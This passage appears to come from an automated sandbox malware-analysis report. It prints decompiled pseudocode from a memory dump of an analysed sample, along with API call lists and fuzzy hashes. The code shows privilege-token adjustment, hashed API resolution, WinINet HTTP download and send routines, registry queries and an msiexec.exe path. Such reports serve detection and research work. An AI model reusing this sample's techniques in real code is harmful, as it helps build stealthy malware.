				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0009BF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E00099D50(0x647400a5);
						E0009BF50(_t59, _t26, E00099D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E0009BF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E0009BF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E00099D50(0x647400a5);
					_t34 = E0009BF50(_t57, _t32, E00099D50(0x6b5f7e12));
					_t36 = E000955C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000a9ca0
0x000a9cb1
0x000a9cb6
0x000a9cb9
0x000a9cbb
0x000a9cc4
0x000a9cc6
0x000a9cc8
0x000a9d0a
0x000a9d10
0x000a9d1f
0x000a9d29
0x000a9d2e
0x000a9d35
0x000a9d37
0x000a9d39
0x000a9d8e
0x000a9d8e
0x000a9d8e
0x000a9d3b
0x000a9d40
0x000a9d59
0x000a9d5e
0x000a9d70
0x000a9d72
0x000a9d74
0x00000000
0x000a9d76
0x000a9d7d
0x000a9d82
0x000a9d85
0x000a9d87
0x000a9d89
0x000a9d89
0x000a9d74
0x000a9d97
0x000a9da2
0x000a9cca
0x000a9ccf
0x000a9ce8
0x000a9cfa
0x000a9cff
0x000a9d02
0x000a9d04
0x000a9da6
0x000a9da6
0x00000000
0x00000000
0x00000000
0x000a9d04
0x000a9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 20b3f2395e56da2729c00de75a3431a9f906f75f4e13e41830d747d92255f8d0
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: 0C21D3A2E403153AEF2036F46D13FBE35589B52B25F090034FD18B92C3FA91AA1495B3

Uniqueness

Uniqueness Score: -1.00%

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00091AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000AB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E0009BF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000955C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E0009B570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000922E0(_t67, _t51 + _t54 + E00099D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E0009B570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E0009BF50(_t63, 0, E00099D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x00091af9
0x00091afc
0x00091b04
0x00091b14
0x00091b17
0x00091b19
0x00091b1c
0x00091b1e
0x00091b48
0x00091b48
0x00091b48
0x00091b4e
0x00091b5a
0x00091b5f
0x00091b62
0x00091b64
0x00000000
0x00000000
0x00091b6d
0x00091b72
0x00091b75
0x00091b86
0x00091b8a
0x00000000
0x00000000
0x00091b8c
0x00091b8f
0x00091b91
0x00091b97
0x00091b9c
0x00091b9f
0x00091ba1
0x00091bed
0x00091bf0
0x00091bf2
0x00091c03
0x00000000
0x00091c0b
0x00091bf7
0x00091bf9
0x00000000
0x00091bfc
0x00091bba
0x00091bbf
0x00091bc5
0x00000000
0x00000000
0x00091bc7
0x00091bc9
0x00091bcb
0x00091bcd
0x00000000
0x00000000
0x00091bd3
0x00091bd8
0x00091bdb
0x00091be3
0x00000000
0x00091be3
0x00091b20
0x00091b30
0x00091b35
0x00091b3b
0x00091b3d
0x00091b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: 06d5e3289d26b77ad21ae167c27f9fb4c6f363e623e0b8f0153b37d360c3f5fe
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: 2731D8B6E0020B6BDF10DE94EC42FFF77A6AF51715F150025F804A7242F771A915A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009BA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000A5000(_a20, _t60, 0xffffffff);
				E0009BF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E00099D50(0x647400a5);
					E0009BF50(_t61, _t26, E00099D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000955C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E00091460(__eflags, _t39, 4);
							_t34 = E00098290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E0009BF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E0009B570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E0009BF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x0009ba66
0x0009ba70
0x0009ba78
0x0009ba90
0x0009ba95
0x0009baa1
0x0009baa3
0x0009baa8
0x0009baaa
0x0009bab0
0x0009bab3
0x0009babf
0x0009bad8
0x0009badd
0x0009baf1
0x0009baf3
0x0009baf5
0x0009bafe
0x0009bb04
0x0009bb09
0x0009bb0c
0x0009bb0e
0x0009bb10
0x0009bb18
0x0009bb21
0x0009bb26
0x0009bb29
0x0009bb2b
0x00000000
0x0009bb2d
0x0009bb2d
0x0009bb36
0x0009bb3b
0x0009bb4e
0x0009bb50
0x0009bb52
0x0009bb5f
0x0009bb61
0x0009bb54
0x0009bb55
0x0009bb5a
0x00000000
0x0009bb5a
0x0009bb52
0x0009bb2b
0x0009baf7
0x0009baf7
0x0009baf7
0x0009baf7
0x0009bb6b
0x0009bb70
0x0009bb76
0x0009bb76
0x0009bb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 0009BAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BB4E
RegCloseKey.KERNEL32(?), ref: 0009BB76

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: 9a0d17dbb8a912238e8bee2854659a4a7f8f4338881ce0d476bedb172a3c650d
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: EE31B3B29002157BEF109E64AD42FFE3658AB15774F090124FD18A62D3F7B1AA1097F2

Uniqueness

Uniqueness Score: -1.00%

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000ABAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E00093750(_t125, E000920A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000AED80( &_v48, _t126, E0009D0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000AFCF0( &_v48);
				_v32 = 0;
				_t43 = E00099D50(0x647400bf);
				E0009BF50(_t126, _t43, E00099D50(0x6f9f943d));
				_t47 = E0009D0A0( &_v65, 0xb04e6,  &_v65);
				_t90 =  ==  ? 0xb0779 : 0xb07f4;
				_t51 = E0009D0A0( &_v204,  ==  ? 0xb0779 : 0xb07f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000AEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E0009BF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E00099D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E00099D50(0x647400bf);
						_t74 = E0009BF50(_t85, _t72, E00099D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E0009BF50(_t131, 0x13, 0xb157a91);
				_t57 = E0009D0A0( &_v97, 0xb0880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					_t59 = E0009BF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E0009BF50(_t132, 0x13, 0x249c261);
					_t82 = E000955C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E00095920( &_v24, _v20, E00099D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000abad0
0x000abaec
0x000abaf6
0x000abaf8
0x000abb1e
0x000abb2a
0x000abb2d
0x000abb39
0x000abb52
0x000abb65
0x000abb7e
0x000abb89
0x000abb8e
0x000abba3
0x000abba5
0x000abba9
0x000abce1
0x000abce4
0x000abcf5
0x000abcf5
0x000abbaf
0x000abbb2
0x000abbb6
0x000abbb8
0x000abbba
0x000abbc1
0x000abbcf
0x000abbd4
0x000abbdd
0x000abbde
0x000abbdf
0x000abbe1
0x000abbe6
0x000abc00
0x000abc00
0x000abc02
0x000abc0a
0x000abc23
0x000abc28
0x000abc34
0x000abc34
0x000abbe6
0x000abc3d
0x000abc50
0x000abc55
0x000abc60
0x000abc62
0x000abc64
0x000abccd
0x000abcd4
0x000abcdd
0x000abcdf
0x000abcdf
0x000abc66
0x000abc66
0x000abc6d
0x000abc7b
0x000abca5
0x000abcb7
0x000abcbc
0x000abcc1
0x00000000
0x00000000
0x000abcc5
0x000abcc7
0x00000000
0x00000000
0x000abcc9
0x000abcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000ABC60

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Strings

HHb?, xrefs: 000ABB0B

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction ID: b90c88e23c4269f42729eee88e10057647c254401fe32fbebffa8165428e63bf
Opcode Fuzzy Hash: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction Fuzzy Hash: 3651C9B2D402197BEF10AAE0EC52FFF76689B51714F050034FE18A6243FB655A1597F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000A1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E0009BF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000955C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000A8F20(_a4, E00099D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E0009BF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E0009BF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E0009BF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E0009BF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E00099D50(0x647400af);
					_t29 = E0009BF50(_t50, _t27, E00099D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E0009BF50(_t50, 0, E00099D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E0009BF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000a1ea3
0x000a1eab
0x000a1eba
0x000a1ebf
0x000a1ec4
0x000a1ec7
0x000a1ec9
0x000a1faa
0x000a1fbb
0x000a1fc3
0x00000000
0x000a1fc3
0x000a1ed6
0x000a1edf
0x000a1ee8
0x000a1eed
0x000a1ef0
0x000a1efc
0x000a1f00
0x000a1f07
0x000a1f09
0x000a1f0b
0x00000000
0x00000000
0x000a1f14
0x000a1f1d
0x000a1f26
0x000a1f2b
0x000a1f2f
0x000a1f31
0x000a1f33
0x00000000
0x00000000
0x000a1f3a
0x000a1f53
0x000a1f5c
0x000a1f6e
0x000a1f73
0x000a1f73
0x000a1f78
0x000a1f80
0x00000000
0x00000000
0x000a1f88
0x000a1f98
0x000a1f9d
0x000a1fa4
0x000a1fa6
0x000a1fa8
0x00000000
0x000a1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000A1EBA

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000A1F07

Strings

{, xrefs: 000A1F78

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 2801a8096cd9e8e6f79e038ecdb2c579e70d8874028a8c49ff257e7c2f12acb3
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: FC2171B6E843493AFA2132B07C63FFA31585B62B5AF050030FD0C64187FAA5AB5955B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0009BCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000A9AC0(__eflags, 0xffffffff); // executed
				_t4 = E00097DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E00099D50(0x647400a4);
				_t8 = E0009BF50(_t3 - _t4, _t6, E00099D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
					_t10 = E0009BF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x0009bcd8
0x0009bce7
0x0009bcfb
0x0009bd03
0x0009bd1c
0x0009bd30
0x0009bd34
0x0009bd41
0x0009bd55
0x0009bd57
0x0009bd59
0x0009bd59
0x00000000
0x0009bd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 0009BD30

Strings

C:\Windows\SysWOW64\msiexec.exe, xrefs: 0009BD4E
C:\Users\user\AppData\Roaming, xrefs: 0009BD24

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction ID: a0fe7930ad87ea9ce1ba0dcedcabb489642e65c530b824d5ec864dc6e48fc1b5
Opcode Fuzzy Hash: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction Fuzzy Hash: 88F06296F8621537FA6121B53C13FBB21488BA2B79F190130FA1D991D3F982A91452B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000A8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E00099D50(0x647400a5);
				_t18 = E0009BF50(_t63, _t16, E00099D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E0009BF50(_t64, 9, 0xbd557e);
				_t22 = E00099D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000955C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E0009BF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000955C0( *((intOrPtr*)(E0009BF50(_t65, 0, E00099D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E00098290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E0009BF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E0009BF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E0009BF50(_t70, 9, 0x7a1c189);
								_t40 = E000922E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E0009B570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000a8590
0x000a859c
0x000a85a8
0x000a85c1
0x000a85c6
0x000a85d0
0x000a85d2
0x000a85d4
0x000a86f6
0x000a86fb
0x000a8704
0x000a8704
0x000a85e1
0x000a85f3
0x000a85fb
0x000a8605
0x000a860a
0x000a860f
0x000a8612
0x000a8617
0x000a8619
0x000a86e0
0x000a86e7
0x000a86f2
0x00000000
0x000a86f2
0x000a863c
0x000a8641
0x000a8646
0x00000000
0x00000000
0x000a864f
0x000a8654
0x000a8657
0x000a8659
0x000a865f
0x000a8668
0x000a866d
0x000a867a
0x000a867c
0x000a8681
0x000a8683
0x000a868c
0x000a8691
0x000a8696
0x000a869a
0x000a869c
0x000a869f
0x000a86a1
0x000a86b2
0x000a86c3
0x000a86c8
0x000a86ce
0x000a86d1
0x000a86d3
0x000a86d5
0x000a86d5
0x000a86d3
0x000a86a1
0x000a869a
0x000a86d8
0x000a86dd
0x000a86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000A8605
CloseHandle.KERNEL32(00000000), ref: 000A86F2

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000A867A

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: ba9c5bada06ca04430abcedf7208d6edaf5fe3ce74e2084dd3272b17d58d7bd4
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: 053182A6E402053BFA1126B46D53BBE35585B52769F090030FD18B52D3FA91AE1497B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0009A5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E0009BF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E0009BF50(_t54, 0, E00099D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E0009BF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E0009BF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E0009BF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
